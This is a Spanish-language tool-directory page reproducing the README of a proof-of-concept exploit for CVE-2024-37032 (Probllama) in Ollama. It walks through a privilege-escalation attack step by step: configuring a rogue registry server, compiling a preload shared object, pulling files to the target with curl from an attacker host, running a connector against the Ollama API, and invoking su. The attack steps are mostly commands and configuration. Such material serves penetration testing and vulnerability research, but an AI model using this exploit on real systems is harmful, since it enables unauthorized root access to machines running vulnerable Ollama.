Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Herramientas/GitHubGitHub/itzsh4dowxz/cve-2024-37032-poc
Escalada de PrivilegiosAnálisis de VulnerabilidadesAnálisis de CódigoExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
itzsh4dowxz/cve-2024-37032-poc

CVE-2024-37032-PoC

CVE-2024-37032 (Probllama) PoC para Ollama ≤0.1.33: path traversal y escritura arbitraria de archivos a través del manejo de digest de modelo, lo que conduce a escalada de privilegios automatizada.

Ver Repositorio
83hace 2 mesesAún no revisado

CVE-2024-37032 Probllama PoC — Ollama Path Traversal y Escalada de Privilegios

Este repositorio contiene un servidor de registro FastAPI de prueba de concepto, un script de conexión y una biblioteca de demostración de precarga para pruebas de laboratorio autorizadas.

Úselo solo en sistemas que posea o para los que tenga permiso explícito de prueba.

Archivos

  • server.py: inicia el servidor PoC FastAPI.
  • rogue_server/config.py: configuración central del servidor PoC.
  • connector.py: envía las solicitudes pull/push a la API Ollama objetivo.
  • preload_privs_demo.c: código fuente C para el payload del objeto compartido.
  • requirements.txt: dependencias de Python para el servidor PoC.

1. Instalar Dependencias del Servidor

En su máquina anfitriona, instale las dependencias de Python:

root@kitploit:~
python -m pip install -r requirements.txt

2. Configurar el Host y los Puertos

Edite rogue_server/config.py en su máquina anfitriona:

root@kitploit:~
HOST = "<your_host_ip_or_host_ip>"

Edite connector.py:

root@kitploit:~
SERVER_HOST = "<your_host_ip_or_host_ip:8000>"
TARGET_HOST = "127.0.0.1"
TARGET_PORT = 11434

Notas:

  • SERVER_HOST debe apuntar al host que ejecuta server.py.
  • Si el servidor PoC se ejecuta en el puerto 8000, incluya el puerto tanto en HOST como en SERVER_HOST, por ejemplo 10.10.16.160:8000.
  • TARGET_HOST y TARGET_PORT deben apuntar a la API Ollama objetivo. Si connector.py se ejecuta directamente en la máquina objetivo, 127.0.0.1:11434 suele ser correcto.
  • Si cambia rogue_server/config.py, reinicie el servidor PoC.

3. Compilar el Objeto Compartido

Compile el archivo C y nombre la salida libpreload_privs_demo.so:

root@kitploit:~
gcc -shared -fPIC -o libpreload_privs_demo.so preload_privs_demo.c

4. Transferir Archivos al Objetivo

Copie estos archivos a la máquina objetivo autorizada:

  • libpreload_privs_demo.so
  • connector.py

Una forma sencilla es servirlos desde su máquina anfitriona:

root@kitploit:~
python3 -m http.server 8081

Luego descárguelos desde la máquina objetivo:

root@kitploit:~
curl -O http://<your_host_ip>:8081/libpreload_privs_demo.so
curl -O http://<your_host_ip>:8081/connector.py

Después de descargar el objeto compartido, copie su ruta absoluta en la máquina objetivo y establezca esa misma ruta como exploit_path en rogue_server/config.py en la máquina anfitriona.

Ejemplo:

root@kitploit:~
exploit_path = "/tmp/libpreload_privs_demo.so"

5. Iniciar el Servidor PoC

Inicie el servidor FastAPI en su máquina anfitriona:

root@kitploit:~
python server.py

Por defecto, este proyecto inicia Uvicorn en 0.0.0.0:8000.

6. Ejecutar el Conector

En la máquina objetivo autorizada, ejecute:

root@kitploit:~
python3 connector.py

El conector envía las solicitudes pull y push a la API Ollama configurada.

7. Validar el Resultado

Después de que el conector termine, ejecute:

root@kitploit:~
su

En un objetivo de laboratorio vulnerable y correctamente configurado, se debería usar la ruta de precarga y se puede observar la transición de privilegios.

Solución de Problemas

  • Confirme que el firewall del host permite el puerto del servidor PoC y el puerto del servidor de archivos temporal.
  • Confirme que SERVER_HOST en connector.py coincida con HOST en rogue_server/config.py.
  • Confirme que exploit_path es la ruta absoluta exacta donde existe libpreload_privs_demo.so en la máquina objetivo.
  • Confirme que la API Ollama objetivo es accesible en TARGET_HOST:TARGET_PORT.
  • Reinicie server.py después de cambiar rogue_server/config.py.
Descargar herramienta